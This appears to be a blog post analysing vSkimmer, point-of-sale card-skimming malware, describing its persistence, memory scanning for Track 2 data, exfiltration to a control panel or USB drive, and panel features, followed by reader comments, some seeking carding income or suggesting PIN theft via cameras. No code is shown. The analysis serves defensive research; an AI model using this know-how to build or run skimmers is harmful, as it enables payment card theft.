vSkimmer - Virtual Skimmer
Functions:
- Track 2 grabber
- HTTP Loader (Download & Execute)
- Update bot itself
Working Modes:
- Online: If internet is reachable it will try to bypass firewalls and communicate to a the control panel.
- Offline: If internet is not reachable it wait for a specific pendrive/flashdrive plugged in and copy logs to it.
Server coded in PHP (can be modified on request to send logs to remote server, via smtp, etc.. )
Client coded in C++ no dependencies, 66kb, cryptable. (can be customized)
Functions:
- Track 2 grabber
- HTTP Loader (Download & Execute)
- Update bot itself
Working Modes:
- Online: If internet is reachable it will try to bypass firewalls and communicate to a the control panel.
- Offline: If internet is not reachable it wait for a specific pendrive/flashdrive plugged in and copy logs to it.
Server coded in PHP (can be modified on request to send logs to remote server, via smtp, etc.. )
Client coded in C++ no dependencies, 66kb, cryptable. (can be customized)
The malware check the presence of debugger:
Get PC details (OS,Computer name, GUID for identify you in the POS botnet, etc..)
Check if the file is executed from %APPDATA% if not add registry persistence, firewall rule, make a copy and execute the copy:
Detail of the registry persistence:
Firewall rule to allow the malware:
Create a mutex, thread and get host information:
Check for process:
Some are whitlisted: "System", smss.exe, csrss.exe, winlogon.exe, services.exe, lsass.exe, svchost.exe, spoolsv.exe, wscntfy.exe, alg.exe, mscorsvw.exe, ctfmon.exe, explorer.exe:
And when finally a process is found:
Read the process and search for pattern:
If nothing found:
Get infos, Base64 and call the gate via GET request:
Answer:
Parse the answer:
Answer is reduced to first 3 letters and compared with 'dlx' (Download & Execute) and 'upd' (Update) if one of these are found that mean the bad guys send us an order.
For example dlx:
Order is executed and a response is send to the server:
The part i love with pos malware:
So the algo detect the pattern, the track2 is encoded to base64
And sent to the panel:
Now for the offline mode, get drive:
The flash drive must be named "KARTOXA007" (dumps in russian)
Create dmpz.log:
Now let's have a look on the panel:
POS Terminals:
Dump download:
Commands:
Settings:
Dumped.. :)
Sample:
https://www.virustotal.com/file/bb12fc4943857d8b8df1ea67eecc60a8791257ac3be12ae44634ee559da91bc0/analysis/1358237597/
Unpack:
https://www.virustotal.com/file/4fba64ad3a7e1daf8ca2d65c3f9b03a49083b7af339b995422c01a1a96532ca3/analysis/1358238314/
Thanks Zora for the sample :)
what forum is shown in this post?
ReplyDeleteI want to make money too :) but i don't know how :( and what way to choose
ReplyDeleteGet a real job. :)
ReplyDeleteCongrants Xyli or Zora and company!
ReplyDeleteNow we know kaddafi.me and his shit forum lampeduza is a more likely a sting. Have much fun, just tell this guys how you got it, because you didn't hacked anything. That was easy man, you were right, Dumped vpos_good.7z he he, Anyway sent you old stripped version and bugged.
I'm luving it, learning new things are always appreciated.
Much love to mossad or whoever you are... later
not my fault if you are stupid enought to get fooled by a scammer.
Deletebtw he didn't give me it, Zora get the bin and i remounted from posterminal.la with a tar.gz on it and several other vuln but i'm not here to talk about how i got the (lame) package.
has a forum where a Russian underground carder sellers s vskimmer this, it installs and makes the entire process, price to match, I found it very interesting because he and installed on a terminal POS.
ReplyDeleteThis honestly was very upsetting and not impressive at all, im sure we all expected better-perhaps the next piece of malware relating to POS will actually be worth even looking into in greater detail lol.
ReplyDeleteyup Zora, claiming to be better than Dexter but i've not see where it's better.
ReplyDeleteIs this botnet (vSkimmer) Have Functions
ReplyDeleteGrabber PIN CARD ??????
This POS software can't grab PINS if I remember correctly.
Delete"Or just a simple ";1234567891234567=12345678912345678900?" in a txt but it's more gangsta to swipe a card."
DeleteHaha, this made me laugh. Good work Xyli! :)
you can get PIN CARD hacking security cam system /m/
DeleteU really ma de money from.this using grabbed CC?
ReplyDelete